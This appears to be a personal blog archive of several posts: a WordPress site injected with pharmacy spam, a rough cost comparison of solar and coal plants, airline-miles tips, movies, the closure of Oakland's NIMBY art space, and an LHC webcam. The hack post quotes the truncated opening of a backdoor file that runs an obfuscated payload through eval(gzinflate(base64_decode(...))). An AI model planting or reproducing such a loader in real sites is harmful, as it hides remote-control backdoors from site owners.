My Blog Hacked for Spam

Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php.  All the links forward to  canadian-meds-shop.com. These are bad people:  scammers and thieves.

I also found a strange file in my wordpress theme file, 1.php. The file started like this:

<?PHP
              //Authentication
$login = “”; //Login
$pass = “”;  //Pass
$md5_pass = “”; //If no pass then hash
eval(gzinflate(base64_decode(‘HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//

I don’t know how this file got there or what it does but I’m pretty sure it’s bad stuff.

Do you want to try and figure out what this evil f’ing spam program does?  Here is the virus file. Caution! This is a bad program! (update: I removed the virus. It’s a bother that it keeps tripping my antivirus software.)

Tell me what you find out, would you?

Now I’ve got to figure out how they got on my system…. grrrrrr.

Solar Futures

(via)

… coal-fired power plant is currently under construction in West Virginia. It is the 695-megawatt Longview plant in Monongalia County. Ground was broken in early 2007 for the $1.83 billion dollar plant – the first coal-fired plant built in West Virginia since 1993.

so it costs $2.6 million per megawatt of capacity to build a coal fired power plant.

(via)

… Nanosolar had teamed up with Beck Energy to build the 10-megawatt power plant, which would cost around €30 million ($42.75 million).

and it costs twice as much, $4.3 million per megawatt of capacity to build a solar powered power plant… only this plant needs no fuel except the sun for the next 10-30 years.

Ugh, there are way too many variables for me to actually say the solar plant is the way to go. The primary questions being:

  • How much does it cost to fuel the coal plant per megawatt-hr
  • What is the solar panel replacement regimen? Do panels need replacing after 5 years? 50?
  • Are the numbers I’m looking at correct? A 10 megawatt solar plant obviously can’t produce at night so we’re not comparing apples to apples…

Ok, lets take a stab at it…. coal costs about $70 per short ton. Coal plants actually produce about 2.5 mWh/ton of coal (How much coal is required to run a 100-watt light bulb 24 hours a day for a year?)

To power the plant for 1 hour and generate 695 megawatts, you need (695/2.5) 278 tons of coal (wow, that’s a lot of truckloads of coal). That coal costs $19,460. To power the plant at full power for 10 years, you’d have to buy $1,704,696,000 in coal. (I’m not counting any other operating expenses but assuming fuel is the largest expense)

So with the solar plant, you’d spend twice as much to build the plant, an extra $1.83 billion and you’d recoup $1.7 billion in fuel costs over 10 years.

Oop, I’ve assumed that the solar plant is capable of running at full power 24 hours a day. Unless the plant is in orbit, it only gets good sun 8 hours/day… 1/3 of the day, tripling the payback period from 10 years to 30. In general amorphous solar panels have a life of 10+ years while crystalline solar panels have a 30+ year life. My first guess is that since Nanosolar’s panels are flexible and “printed” instead of grown crystals that they will have a similar lifespan to amorphous panels. But I certainly could be wrong, after all, they’ve got the word “nano” in the company’s name. And, more importantly, they put a 25 year warranty on the panels, hmm!

If the solar plant has a useful life of 30 years without major repairs (total panel or inverter replacement), it would seem that the costs of a solar plant are conceivably comparable to a coal fired plant. And that’s what we’ve all been hoping for. And then there’s that whole carbon-neutral, no-sulphur-dioxide, renewable thing…

Very exciting.

Today be Park(ing) Day, me Mateys

Avast! Not only is today international Park(ing) Day, (the only holiday with parenthesis that I know of) it’s also Talk Like a Pirate Day.

I see tremendous possibilities for boarding mobile parks cutlass clenched in me teeth.

Tips on Flying

I used my airline miles to reserve a flight to New Jersey to see family next week…

First flight tip:  I went to American Airlines and was going to reserve seats last night but grumbled about having to redeem 50,000 miles + $60 instead of 25,000 miles to fly on the day I wanted (Sept 27th). Apparently, when you book < 21 days in advance, you get hit with a $50 surcharge, and I would have to fly 3 days earlier on Wednesday to fly for 25,000 miles. Grumble grumble. So I log on today and there are several seats available for 25,000 miles + $60. I took it!  I’m guessing that the inexpensive airline miles seats opened up “10 days” before the flight.  The flight is on the 27th and today is the 17th.

Second flight tip:  I went to SeatGuru.com  to look at the plane. Good thing. I had been automatically assigned seat E-31 on American’s MD-80. That is 1 row in front of the bathroom, very loud due to the engine’s proximity and no view due to the engine just outside the window. Reading this description, I recall sitting in this seat in 2004 on my flight back from Burning Man. It was awful, like being trapped in a basement under a power plant for a few hours. So I moved my seats. Apparently, AA puts people in those yucky seats by default. I saved myself 3 rides in the back of the bus by selecting my seats.

Third flight tip: Use credit cards that earn you miles. Right now in my wallet is an AAdvantage CitiBusiness Citi Mastercard. They will give me 25,000 miles if I spent $750 in 4 months. I’m 3 weeks in and have spent $550. I have another AAdvantage Citi Mastercard; I did the same on that card in May. I called to cancel and they offered me 5 “miles” for every dollar I spend at gas stations, supermarkets and drug stores for a year. So I’ll use the latter card for gas and the former for everything else. Of course, I’ll make sure to cancel my card before the anniversary date, when they charge me an $85/year membership fee. I’ve earned about 100,000 airline miles in the last 3 years doing this. I’ve found many of these deals at Citicards.com. I’m a little concerned about hurting my credit rating, flipping cards so quickly; so I’ve made sure to have a max of 3 cards at any time and I pay them off completely every month (habitual non-payment of credit debt is, as we all know, for suckers).

Movies Seen Recently

Tampopo: saw with Charlotte and Cindy the other night. Wow! A trip!

Big Night: Charlotte hadn’t seen it so we rented it. I thought it was as terrific a film as the first time I saw it years ago. She thought it was depressing, ending how it did.

Iron Man: saw with Charlotte last night. Lots of fun, explosions and comic book coolness

NIMBY in Crisis

via Lady Bee on the Burning Man Artists-Announce mailing list, From Rachael

I wanted to make sure everyone here had heard about the current crisis being faced by one of the main art spaces in the Bay Area.  An incredible amount of Burning Man art has been produced there.  Read the note below to learn more about the closure (and future plans) of this great space.

NIMBY, a 40,000 square foot industrial art space located in West Oakland, California, was shut down by the City of Oakland for non- compliance to fire and building codes on September 11, 2008.  The inspection conducted by the City of Oakland was in response to a fire at the building on September 10, 2008.

For 5 years NIMBY has been the largest industrial art space in the Bay Area.  Over 40 groups, comprised of over 200 artists, use the

space for designing, fabricating and storing large-scale projects.

The closure of NIMBY is having a huge impact on the arts community in our area.

The City of Oakland is offering assistance to help NIMBY relocate to a new building.  City officials are being supportive in helping with locating available properties, and working with us to design a space that can meet the needs of artists while complying with building and fire codes.  While we are grateful for this show of support we must find considerable outside financial assistance to make this move possible.

We are working to create a new space that is larger and more versatile than the current NIMBY, turning this tragedy into an opportunity for expansion.  Included in the plans is a massive, permanent gallery space for large-scale works of art usually left in storage.  Artists will then be able to design, construct, and showcase their pieces between events in one space, allowing them increased exposure for their art.

In order for this vision to be realized NIMBY must receive support from the entire arts community.  Please visit our website  (NIMBYspace.org) for more details on the closure and to make a donation.  The entire Bay Area arts community is depending on the support of the national arts community to save NIMBY.

Below are links for just a few of the pieces that have been created at NIMBY.  Please contact me should you have any questions or ideas for partnering with our organization.

BngBng.net

I’m considering starting bngbng.net, a site wher……… Ha! It’s already been done! Check it out.

Well actually, I was hoping to do something a little different. I’d like to start a boingboing.net where people are free (as in beer on the fourth of July) to comment. It wouldn’t take much effort to build it.

Grab stories and comments from BoingBoing (it’s Creative Commons non-commercial, attribution 2.5). Just use our own comment system.

Rick T made interested noises… Anyone else?

I’m sure you’re asking yourself, “Self, why is Lee talking about Boing Boing but with no vowels?” I’m glad you asked. Check out this post I wrote about  Disemvoweling. And then  this.

RIP NIMBY

Update 9-15-08: “Gears are turning and plans for the relocation of NIMBY are in the works” on the NIMBY website!

Update 4-13-11: NIMBY continues to rock!

NIMBY is  was is an incredible space  for art. The place has ENERGY! I worked on Colossus there. I’ve got friends that work on art there, including the Dance Dance Immolation crew. The Serpent Mother is being stored there. And… Therm, Kinetic Steamworks, Simnuke, The Disgusting Spectacle, Tom Kennedy. Those are just the artists and groups I know personally.

I spent my first summer in San Francisco grinding away at the sharp edges of Colossus. I had seen Corbett Griffith and Zachary Coffin and Daniel Bauen at the Desert Arts Preview at the Crucible in July. Corbett said something like, “it’s been entirely designed and most of the parts have been cut out. Now we just have to put it together.” I was all over it. I walked up and gave them a good hunk of my summer. One highlight that summer was that I got to see…. take a read.

The next summer, I got to attend an incredible Fight Party

And here’s a video walkthrough I did of NIMBY when I was working on Colossus in 2005

Here is how the NIMBY website  reads today:

RIP NIMBY – April 1, 2004 to Sept 11, 2008.

posted by admin on Sep 11

As of September 11, 2008 the City of Oakland has regretfully closed the industrial art space known as NIMBY. For the last 5 years NIMBY has been a center of creative collaboration and artistic expression for talented mis-fits.
What happened?

Early morning on September 10th a fire occurred in a studio space in the NIMBY warehouse. An unattended candle that was being used in a digital photography project has been cited at the cause of the fire. Several NIMBY tenants who were working late (or early) attempted to put out the fire themselves, but the fire got out of control. Two calls were made to the Oakland Fire Department – one from the nearby Tork systems, and one from NIMBY brought a quick response. The fire was successfully put out, leaving NIMBY in fair shape and smoke free. Property damage was confined to the studio space where the fire originated and some sky-lights in the buildings roof.

However, the Oakland Fire Department was then obligated to further investigate the cause of the fire and conditions in the shop space. Following the fire NIMBY tenants were ordered to vacate the premises and were only allowed supervised entry to access tools that they needed.

A complete inspection, with representatives from four different city departments, followed on September 11th. The inspectors and fire fighters were too numerous to count and they scrutinized every inch of NIMBY. The inspectors loved everything; the hot rods, the glass blowing, the fire sculptures, the tile work, and the wood working. However, they were aghast that all of these projects were being done in the same space. They hated to shut us down, but couldn’t find any way to legally let us continue.
burned out containersWhen they left, they let us know that our only option was to vacate the space and start fresh somewhere else. Jail was an alternative if we chose not to comply. Bringing everything up to code in the current building – ain’t gonna happen.
What next?

The city of Oakland is doing everything they can to support the relocation of NIMBY in Oakland. They want to keep us here and support the arts – but they are going to make sure that we do it to code. We are so pleased to have this unexpected outpouring of city support and we have already looked a number of potential new buildings.
What can you do?

Donate! Funds are needed to support the relocation effort. Even though the city is helping – they won’t be forking over the bucks it takes to move over a thousand tons of bullshit to a new location. So help us.

LHC Webcam, Tallyho!

There is a webcam in the Large Hadron Collider facility! Check it out!

Here’s another tidbit from the person hosting the LHC webcam. I love this.

The LHC webcam page reads:

LHC Compact Muon Solenoid Experiment WebcamsThere are currently two webcams online

  • Camera 7:  looking at the Underground Experimental Cavern from the Saleve side.
  • Camera 8:  looking out of the window of the 1st Floor of the SCX building that houses the CMS Control room.
